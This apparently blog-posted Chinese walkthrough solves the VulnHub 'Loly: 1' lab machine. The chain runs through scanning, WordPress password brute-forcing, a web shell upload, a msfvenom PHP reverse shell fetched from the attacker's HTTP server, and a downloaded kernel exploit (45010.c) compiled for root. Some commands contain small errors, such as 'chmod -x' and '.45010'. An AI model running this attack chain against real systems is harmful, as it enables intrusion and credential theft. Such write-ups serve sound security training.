vulnhub Loly: 1

靶机地址: https://www.vulnhub.com/entry/loly-1,538/

Kali IP:172.16.12.129

1.主机发现

Nmap -sP 172.16.12.0/24

vulnhub Loly: 1_第1张图片

2.端口扫描

nmap -P 172.16.12.130

vulnhub Loly: 1_第2张图片

3.访问

vulnhub Loly: 1_第3张图片

4.目录扫描

dirb http://172.16.12.130/

vulnhub Loly: 1_第4张图片

扫描到/wordpress

5.爆破wordpress用户名和密码

wpscan --url http://172.16.12.130/wordpress -e

vulnhub Loly: 1_第5张图片

爆破密码

wpscan --url http://172.16.12.130/wordpress -U loly -P /usr/share/wordlists/rockyou.txt

vulnhub Loly: 1_第6张图片

6. 访问http://172.16.12.130/wordpress/wp-login.php

vulnhub Loly: 1_第7张图片

判断loly.lc是域名

7. 修改/etc/hosts文件

vim /etc/hosts

vulnhub Loly: 1_第8张图片

8.登录

vulnhub Loly: 1_第9张图片

vulnhub Loly: 1_第10张图片

9. 发现AdRotate的Manage Media中有一个上传文件的地方

vulnhub Loly: 1_第11张图片

10. 写一个木马并压缩,上传

vulnhub Loly: 1_第12张图片

11.访问http://172.16.12.130/wordpress/wp-content/banners/123.php,连接蚁剑

vulnhub Loly: 1_第13张图片

12. 查看靶机上的/var/www/html/wordpress/wp-config.php文件,发现数据库密码为

Lolyisabeautifulgirl

vulnhub Loly: 1_第14张图片

13. 连接msf

利用msf生成反弹连接木马

msfvenom -p php/meterpreter/reverse_tcp lhost=172.16.12.129 lport=4444 -o shell.php

开放python简易下载模块

python -m http.server 888

蚁剑下载反弹连接木马

wget 172.16.12.129:888/shell.php

vulnhub Loly: 1_第15张图片

14.开启msf监听

msfconsole

use multi/handler

set lhost 172.16.12.129

set payload php/meterpreter/reverse_tcp

run

vulnhub Loly: 1_第16张图片

15.访问http://172.16.12.130/wordpress/shell.php,因为我木马下载到了wordpress下,所以我访问这个地址

Msf连接成功

vulnhub Loly: 1_第17张图片

16. 利用交互式shell成功提权www用户

shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

vulnhub Loly: 1_第18张图片

17.切换loly用户

su loly

vulnhub Loly: 1_第19张图片

18. 查看内核版本 找一下有没有漏洞

uname -a

searchsploit ubuntu 16.04

vulnhub Loly: 1_第20张图片

将对应木马复制进本地

searchsploit -m 45010.c  

vulnhub Loly: 1_第21张图片

开启python简易http服务

python -m http.server 888

19. 靶机下载木马并执行

wget 172.16.12.129:888/45010.c

vulnhub Loly: 1_第22张图片

增加执行权限

chmod -x 45010.c

执行

gcc 45010.c -o 45010

.45010

vulnhub Loly: 1_第23张图片

20.查看flag

cat /root/root.txt

vulnhub Loly: 1_第24张图片

你可能感兴趣的:(安全,渗透)